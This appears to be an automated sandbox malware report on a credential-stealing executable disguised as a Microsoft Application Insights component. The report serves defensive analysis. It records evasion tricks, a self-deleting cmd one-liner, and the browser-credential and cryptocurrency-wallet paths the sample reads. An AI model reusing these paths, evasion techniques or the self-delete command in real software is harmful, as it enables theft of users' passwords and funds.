Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: WerFault.exe, 0000000B.00000002.726935016.0000000004FD0000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW

Anti Debugging:

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00403C80 VirtualProtect ?,00000004,00000100,00000000,?,?,00000104 2_2_00403C80
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00405E20 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_00405E20
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00409850 GetProcessHeap,RtlAllocateHeap,memset,GetTimeZoneInformation,wsprintfA, 2_2_00409850
Enables debug privileges
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_0040ADE0 mov eax, dword ptr fs:[00000030h] 2_2_0040ADE0
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

.NET source code references suspicious native API functions
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, u00341CE8079/u00310F343D7.cs Reference to suspicious API methods: ('6F31A696', 'GetProcAddress@kernel32')
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, u00341CE8079/u0036B2E13A8.cs Reference to suspicious API methods: ('D18D907C', 'VirtualProtect@kernel32')
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, u00341CE8079/A9B2B86E.cs Reference to suspicious API methods: ('075920FD', 'LoadLibraryEx@kernel32.dll')
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.1.unpack, u00341CE8079/u0036B2E13A8.cs Reference to suspicious API methods: ('D18D907C', 'VirtualProtect@kernel32')
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.1.unpack, u00341CE8079/A9B2B86E.cs Reference to suspicious API methods: ('075920FD', 'LoadLibraryEx@kernel32.dll')
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.1.unpack, u00341CE8079/u00310F343D7.cs Reference to suspicious API methods: ('6F31A696', 'GetProcAddress@kernel32')
Source: 0.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/A9B2B86E.cs Reference to suspicious API methods: ('075920FD', 'LoadLibraryEx@kernel32.dll')
Source: 0.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/u00310F343D7.cs Reference to suspicious API methods: ('6F31A696', 'GetProcAddress@kernel32')
Source: 0.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/u0036B2E13A8.cs Reference to suspicious API methods: ('D18D907C', 'VirtualProtect@kernel32')
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.15.unpack, u00341CE8079/A9B2B86E.cs Reference to suspicious API methods: ('075920FD', 'LoadLibraryEx@kernel32.dll')
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.15.unpack, u00341CE8079/u0036B2E13A8.cs Reference to suspicious API methods: ('D18D907C', 'VirtualProtect@kernel32')
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.15.unpack, u00341CE8079/u00310F343D7.cs Reference to suspicious API methods: ('6F31A696', 'GetProcAddress@kernel32')
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/u00310F343D7.cs Reference to suspicious API methods: ('6F31A696', 'GetProcAddress@kernel32')
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/u0036B2E13A8.cs Reference to suspicious API methods: ('D18D907C', 'VirtualProtect@kernel32')
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/A9B2B86E.cs Reference to suspicious API methods: ('075920FD', 'LoadLibraryEx@kernel32.dll')
Source: 2.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.1.unpack, u00341CE8079/u0036B2E13A8.cs Reference to suspicious API methods: ('D18D907C', 'VirtualProtect@kernel32')
Source: 2.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.1.unpack, u00341CE8079/u00310F343D7.cs Reference to suspicious API methods: ('6F31A696', 'GetProcAddress@kernel32')
Source: 2.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.1.unpack, u00341CE8079/A9B2B86E.cs Reference to suspicious API methods: ('075920FD', 'LoadLibraryEx@kernel32.dll')
Source: 2.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.0.unpack, u00341CE8079/u0036B2E13A8.cs Reference to suspicious API methods: ('D18D907C', 'VirtualProtect@kernel32')
Source: 2.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.0.unpack, u00341CE8079/A9B2B86E.cs Reference to suspicious API methods: ('075920FD', 'LoadLibraryEx@kernel32.dll')
Source: 2.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.0.unpack, u00341CE8079/u00310F343D7.cs Reference to suspicious API methods: ('6F31A696', 'GetProcAddress@kernel32')
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process created: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout /t 5 & del /f /q 'C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe' & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678687075.0000000001880000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678687075.0000000001880000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678687075.0000000001880000.00000002.00020000.sdmp Binary or memory string: Progman
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678687075.0000000001880000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Queries volume information: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe VolumeInformation
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Runtime.dll VolumeInformation
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,LocalFree, 2_2_00409930
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00410E40 GetLocalTime,SystemTimeToFileTime, 2_2_00410E40
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00409850 GetProcessHeap,RtlAllocateHeap,memset,GetTimeZoneInformation,wsprintfA, 2_2_00409850
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00405840 memset,GetVersionExA,WideCharToMultiByte,lstrlen,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,WideCharToMultiByte,lstrlen,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat, 2_2_00405840
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_004097B0 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 2_2_004097B0

Stealing of Sensitive Information:

Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Yara detected Credential Stealer
Source: Yara match File source: 00000002.00000002.684293295.0000000000BAB000.00000004.00000020.sdmp, type: MEMORY